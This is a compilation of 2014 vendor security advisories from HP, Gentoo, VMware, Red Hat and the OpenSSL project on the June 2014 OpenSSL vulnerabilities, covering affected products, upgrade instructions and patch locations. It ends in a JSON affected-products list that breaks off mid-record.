Perform steps 1 - 4 as outlined above for users with HP Insight Control server deployment v7.1.2, v7.2.0, and v7.2.1. Download the HP SUM ZIP file from http://www.hp.com/swpublishing/MTX-f6c141a7feeb4a358bbb28300f
Extract the contents from the HP SUM ZIP file to \eXpress\hpfeatures\fw-proLiant\components location on the Insight Control server deployment server
Related security bulletins:
For System Management Homepage please see Security bulletin HPSBMU03051 https ://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04 345210
For HP Version Control Agent please see Security bulletin HPSBMU03057 https:/ /h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c0434 9897
HISTORY Version:1 (rev.1) - 8 August 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux)
iEYEARECAAYFAlPk9ewACgkQ4B86/C0qfVn1/gCfR2U/mZZXYwPms9ptZcBTua/5 MoQAn1qlQ3kmLRs7YFN5GzwBTRfSK5Go =r0qe -----END PGP SIGNATURE----- .
Workaround
There is no known workaround at this time.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.1h-r1"
References
[ 1 ] CVE-2010-5298 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-5298 [ 2 ] CVE-2014-0195 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0195 [ 3 ] CVE-2014-0198 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0198 [ 4 ] CVE-2014-0221 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0221 [ 5 ] CVE-2014-0224 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0224 [ 6 ] CVE-2014-3470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3470 [ 7 ] OpenSSL Security Advisory [05 Jun 2014] http://www.openssl.org/news/secadv_20140605.txt
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201407-05.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . Summary
VMware product updates address OpenSSL security vulnerabilities.
- Problem Description
a.
OpenSSL libraries have been updated in multiple products to
versions 0.9.8za and 1.0.1h in order to resolve multiple security
issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2014-0224, CVE-2014-0198,
CVE-2010-5298, CVE-2014-3470, CVE-2014-0221 and CVE-2014-0195 to
these issues. The most important of these issues is
CVE-2014-0224.
CVE-2014-0198, CVE-2010-5298 and CVE-2014-3470 are considered to
be of moderate severity. Exploitation is highly unlikely or is
mitigated due to the application configuration.
CVE-2014-0221 and CVE-2014-0195, which are listed in the OpenSSL
Security Advisory (see Reference section below), do not affect
any VMware products. For readability
the affected products have been split into 3 tables below,
based on the different client-server configurations and
deployment scenarios. Applying these patches to
affected servers will mitigate the affected clients (See Table 1
below).
Clients that communicate over untrusted networks such as public
Wi-Fi and communicate to a server running a vulnerable version of
OpenSSL 1.0.1. can be mitigated by using a secure network such as
VPN (see Table 2 below).
Clients and servers that are deployed on an isolated network are
less exposed to CVE-2014-0224 (see Table 3 below). The affected
products are typically deployed to communicate over the
management network.
RECOMMENDATIONS
VMware recommends customers evaluate and deploy patches for
affected Servers in Table 1 below as these patches become
available. Patching these servers will remove the ability to
exploit the vulnerability described in CVE-2014-0224 on both
clients and servers. VMware recommends customers consider
applying patches to products listed in Table 2 & 3 as required.
Column 4 of the following tables lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============== ======= ======= =============
ESXi 5.5 ESXi ESXi550-
201406401-SG
Big Data Extensions 1.1 patch pending
Charge Back Manager 2.6 patch pending
Horizon Workspace Server
GATEWAY 1.8.1 patch pending
Horizon Workspace Server
GATEWAY 1.5 patch pending
Horizon Workspace Server
DATA 1.8.1 patch pending
Horizon Mirage Edge Gateway 4.4.2 patch pending
Horizon View 5.3.1 patch pending
Horizon View Feature Pack 5.3 SP2 patch pending
NSX for Multi-Hypervisor 4.1.2 patch pending
NSX for Multi-Hypervisor 4.0.3 patch pending
NSX for vSphere 6.0.4 patch pending
NVP 3.2.2 patch pending
vCAC 6.0.1 patch pending
vCloud Networking and Security 5.5.2 patch pending
vCloud Networking and Security 5.1.2 patch pending
vFabric Web Server 5.3.4 patch pending
vCHS - DPS-Data Protection 2.0 patch pending
Service
Table 2
========
Affected clients running a vulnerable version of OpenSSL 0.9.8
or 1.0.1 and communicating over an untrusted network.
VMware Product Running Replace with/
Product Version on Apply Patch
============== ======= ======= =============
vCSA 5.5 patch pending
vCSA 5.1 patch pending
vCSA 5.0 patch pending
ESXi 5.1 ESXi patch pending
ESXi 5.0 ESXi patch pending
Workstation 10.0.2 any patch pending
Workstation 9.0.3 any patch pending
Fusion 6.x OSX patch pending
Fusion 5.x OSX patch pending
Player 10.0.2 any patch pending
Player 9.0.3 any patch pending
Chargeback Manager 2.5.x patch pending
Horizon Workspace Client for 1.8.1 OSX patch pending
Mac
Horizon Workspace Client for 1.5 OSX patch pending
Mac
Horizon Workspace Client for 1.8.1 Windows patch pending
Windows
Horizon Workspace Client for 1.5 Windows patch pending
OVF Tool 3.5.1 patch pending
OVF Tool 3.0.1 patch pending
vCenter Operations Manager 5.8.1 patch pending
vCenter Support Assistant 5.5.0 patch pending
vCenter Support Assistant 5.5.1 patch pending
vCD 5.1.2 patch pending
vCD 5.1.3 patch pending
vCD 5.5.1.1 patch pending
vCenter Site Recovery Manager 5.0.3.1 patch pending
Table 3
=======
The following table lists all affected clients running a
vulnerable version of OpenSSL 0.9.8 or 1.0.1 and communicating
over an untrusted network.
VMware Product Running Replace with/
Product Version on Apply Patch
============== ======= ======= =============
vCenter Server 5.5 any patch pending
vCenter Server 5.1 any patch pending
vCenter Server 5.0 any patch pending
Update Manager 5.5 Windows patch pending
Update Manager 5.1 Windows patch pending
Update Manager 5.0 Windows patch pending
Config Manager (VCM) 5.6 patch pending
Horizon View Client 5.3.1 patch pending
Horizon View Client 4.x patch pending
Horizon Workspace 1.8.1 patch pending
Horizon Workspace 1.5 patch pending
ITBM Standard 1.0.1 patch pending
ITBM Standard 1.0 patch pending
Studio 2.6.0.0 patch pending
Usage Meter 3.3 patch pending
vCenter Chargeback Manager 2.6 patch pending
vCenter Converter Standalone 5.5 patch pending
vCenter Converter Standalone 5.1 patch pending
vCD (VCHS) 5.6.2 patch pending
vCenter Site Recovery Manager 5.5.1 patch pending
vCenter Site Recovery Manager 5.1.1 patch pending
vFabric Application Director 5.2.0 patch pending
vFabric Application Director 5.0.0 patch pending
View Client 5.3.1 patch pending
View Client 4.x patch pending
VIX API 5.5 patch pending
VIX API 1.12 patch pending
vMA (Management Assistant) 5.1.0.1 patch pending
VMware Data Recovery 2.0.3 patch pending
VMware vSphere CLI 5.5 patch pending
vSphere Replication 5.5.1 patch pending
vSphere Replication 5.6 patch pending
vSphere SDK for Perl 5.5 patch pending
vSphere Storage Appliance 5.5.1 patch pending
vSphere Storage Appliance 5.1.3 patch pending
vSphere Support Assistant 5.5.1 patch pending
vSphere Support Assistant 5.5.0 patch pending
vSphere Virtual Disk 5.5 patch pending
Development Kit
vSphere Virtual Disk 5.1 patch pending
Development Kit
vSphere Virtual Disk 5.0 patch pending
Development Kit
- Solution
ESXi 5.5
Download: https://www.vmware.com/patchmgr/download.portal
Release Notes and Remediation Instructions: http://kb.vmware.com/kb/2077359
- References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470
https://www.openssl.org/news/secadv_20140605.txt
- Change Log
2014-06-10 VMSA-2014-0006 Initial security advisory in conjunction with the release of ESXi 5.5 updates on 2014-06-10
- Contact
E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
security-announce at lists.vmware.com
bugtraq at securityfocus.com
fulldisclosure at seclists.org
E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories http://www.vmware.com/security/advisories
VMware Security Response Policy https://www.vmware.com/support/policies/security_response.html
VMware Lifecycle Support Phases https://www.vmware.com/support/policies/lifecycle.html
Twitter https://twitter.com/VMwareSRC
Copyright 2014 VMware Inc. All rights reserved. The updates are available from the following location using ftp:
ftp://srt03046:Secure12@ftp.usa.hp.com
User name: srt03046 Password: Secure12 ( NOTE: Case sensitive)
HP-UX Release HP-UX OpenSSL version
B.11.11 (11i v1) A.00.09.08za.001_HP-UX_B.11.11_32+64.depot
B.11.23 (11i v2) A.00.09.08za.002_HP-UX_B.11.23_IA-PA.depot
B.11.31 (11i v3) A.00.09.08za.003_HP-UX_B.11.31_IA-PA.depot
MANUAL ACTIONS: Yes - Update
Install OpenSSL A.00.09.08za or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant. OpenSSL Security Advisory [05 Jun 2014]
SSL/TLS MITM vulnerability (CVE-2014-0224)
An attacker using a carefully crafted handshake can force the use of weak keying material in OpenSSL SSL/TLS clients and servers. This can be exploited by a Man-in-the-middle (MITM) attack where the attacker can decrypt and modify traffic from the attacked client and server.
The attack can only be performed between a vulnerable client and server. Users of OpenSSL servers earlier than 1.0.1 are advised to upgrade as a precaution.
OpenSSL 0.9.8 SSL/TLS users (client and/or server) should upgrade to 0.9.8za. OpenSSL 1.0.0 SSL/TLS users (client and/or server) should upgrade to 1.0.0m. OpenSSL 1.0.1 SSL/TLS users (client and/or server) should upgrade to 1.0.1h.
Thanks to KIKUCHI Masashi (Lepidum Co. Ltd.) for discovering and researching this issue. This issue was reported to OpenSSL on 1st May 2014 via JPCERT/CC.
The fix was developed by Stephen Henson of the OpenSSL core team partly based on an original patch from KIKUCHI Masashi.
DTLS recursion flaw (CVE-2014-0221)
By sending an invalid DTLS handshake to an OpenSSL DTLS client the code can be made to recurse eventually crashing in a DoS attack.
Only applications using OpenSSL as a DTLS client are affected.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h.
Thanks to Imre Rad (Search-Lab Ltd.) for discovering this issue. This issue was reported to OpenSSL on 9th May 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
DTLS invalid fragment vulnerability (CVE-2014-0195)
A buffer overrun attack can be triggered by sending invalid DTLS fragments to an OpenSSL DTLS client or server.
Only applications using OpenSSL as a DTLS client or server affected.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h.
Thanks to Jüri Aedla for reporting this issue. This issue was reported to OpenSSL on 23rd April 2014 via HP ZDI.
The fix was developed by Stephen Henson of the OpenSSL core team.
SSL_MODE_RELEASE_BUFFERS NULL pointer dereference (CVE-2014-0198)
A flaw in the do_ssl3_write function can allow remote attackers to cause a denial of service via a NULL pointer dereference. This flaw only affects OpenSSL 1.0.0 and 1.0.1 where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the default and not common.
OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 1.0.1 users should upgrade to 1.0.1h.
This issue was reported in public. The fix was developed by Matt Caswell of the OpenSSL development team.
SSL_MODE_RELEASE_BUFFERS session injection or denial of service (CVE-2010-5298)
A race condition in the ssl3_read_bytes function can allow remote attackers to inject data across sessions or cause a denial of service. This flaw only affects multithreaded applications using OpenSSL 1.0.0 and 1.0.1, where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the default and not common.
OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 1.0.1 users should upgrade to 1.0.1h.
This issue was reported in public.
Anonymous ECDH denial of service (CVE-2014-3470)
OpenSSL TLS clients enabling anonymous ECDH ciphersuites are subject to a denial of service attack.
OpenSSL 0.9.8 users should upgrade to 0.9.8za OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 1.0.1 users should upgrade to 1.0.1h.
Thanks to Felix Gröbert and Ivan Fratrić at Google for discovering this issue. This issue was reported to OpenSSL on 28th May 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
Other issues
OpenSSL 1.0.0m and OpenSSL 0.9.8za also contain a fix for CVE-2014-0076: Fix for the attack described in the paper "Recovering OpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack" Reported by Yuval Yarom and Naomi Benger. This issue was previously fixed in OpenSSL 1.0.1g.
References
URL for this Security Advisory: http://www.openssl.org/news/secadv_20140605.txt
Note: the online version of the advisory may be updated with additional details over time.
The Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Relevant releases/architectures:
Red Hat Storage Server 2.1 - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. (CVE-2014-0195)
Multiple flaws were found in the way OpenSSL handled read and write buffers when the SSL_MODE_RELEASE_BUFFERS mode was enabled. A specially crafted DTLS handshake packet could cause a DTLS client using OpenSSL to crash. A specially crafted handshake packet could cause a TLS/SSL client that has the anonymous ECDH cipher suite enabled to crash. (CVE-2014-3470)
Red Hat would like to thank the OpenSSL project for reporting these issues. Upstream acknowledges KIKUCHI Masashi of Lepidum as the original reporter of CVE-2014-0224, Jüri Aedla as the original reporter of CVE-2014-0195, Imre Rad of Search-Lab as the original reporter of CVE-2014-0221, and Felix Gröbert and Ivan Fratrić of Google as the original reporters of CVE-2014-3470. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258
- Package List:
Red Hat Storage Server 2.1:
Source: openssl-1.0.1e-16.el6_5.14.src.rpm
x86_64: openssl-1.0.1e-16.el6_5.14.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.14.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.14.x86_64.rpm openssl-static-1.0.1e-16.el6_5.14.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201406-0137", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "smartcloud provisioning", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "2.3" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "0.9.8za" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "19" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "0.9.8" }, { "model": "mariadb", "scope": "lt", "trust": 1.0, "vendor": "mariadb", "version": "10.0.13" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "20" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "mariadb", "scope": "gte", "trust": 1.0, "vendor": "mariadb", "version": "10.0.0" }, { "model": "leap", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "42.1" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "13.2" }, { "model": "bladecenter advanced management module 3.66e", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "fedora", "scope": null, "trust": 0.8, "vendor": "fedora", "version": null }, { "model": "api management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "3.0 (ibm pureapplication system and xen)" }, { "model": "api management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "3.0 (vmware)" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "patient hub 10.0" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "provider hub 10.0" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "standard/advanced edition 11.0" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "standard/advanced edition 11.3" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "10.0" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "10.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "8.5" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "9.0" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "9.2" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "9.5" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "9.7" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "patient hub 9.5" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "patient hub 9.7" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "provider hub 9.5" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "provider hub 9.7" }, { "model": "sdk,", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "for node.js 1.1.0.3" }, { "model": "smartcloud orchestrator", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.3" }, { "model": "smartcloud orchestrator", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.3 fp1" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.1 for ibm provided software virtual appliance" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.3 fp1" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "4.1.1 (linux-ix86 and linux-s390)" }, { "model": "tivoli workload scheduler", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "distributed 8.4.0 fp07" }, { "model": "tivoli workload scheduler", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "distributed 8.5.0 fp04" }, { "model": "tivoli workload scheduler", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "distributed 8.5.1 fp05" }, { "model": "tivoli workload scheduler", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "distributed 8.6.0 fp03" }, { "model": "tivoli workload scheduler", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "distributed 9.1.0 fp01" }, { "model": "tivoli workload scheduler", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "distributed 9.2.0 ga level" }, { "model": "tivoli composite application manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for transactions 7.2" }, { "model": "tivoli composite application manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for transactions 7.3" }, { "model": "tivoli composite application manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for transactions 7.4" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "0.9.8 thats all 0.9.8za" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.0 thats all 1.0.0m" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1 thats all 1.0.1h" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.7.5" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.8.5" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.9 to 10.9.4" }, { "model": "mac os x server", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.7.5" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.63" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.71" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 5.0" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 5.1" }, { "model": "vm virtualbox", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "3.2.24" }, { "model": "vm virtualbox", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "4.0.26" }, { "model": "vm virtualbox", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "4.1.34" }, { "model": "vm virtualbox", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "4.2.26" }, { "model": "vm virtualbox", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "4.3.14" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "6" }, { "model": "storage", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "2.1" }, { "model": "l20/300", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "lto6 drive", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "lx/30a", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "integrated system ha database ready", "scope": null, "trust": 0.8, "vendor": "fujitsu", "version": null }, { "model": "symfoware", "scope": "eq", "trust": 0.8, "vendor": "fujitsu", "version": "analytics server" }, { "model": "symfoware", "scope": "eq", "trust": 0.8, "vendor": "fujitsu", "version": "server" }, { "model": "openssl", "scope": null, "trust": 0.7, "vendor": "openssl", "version": null }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.14" }, { "model": "security enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.3" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "spa232d multi-line dect ata", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "policy center v100r003c00spc305", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "10.0-beta", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "solaris", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "11.1.20.5.0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.2" }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "documentum content server p06", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "chrome for android", "scope": "ne", "trust": 0.3, "vendor": "google", "version": "35.0.1916.141" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip pem", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "9.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "ip video phone e20", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "blackberry enterprise service", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.2.6" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "ios software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "ios xe software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "mate products", "scope": "eq", 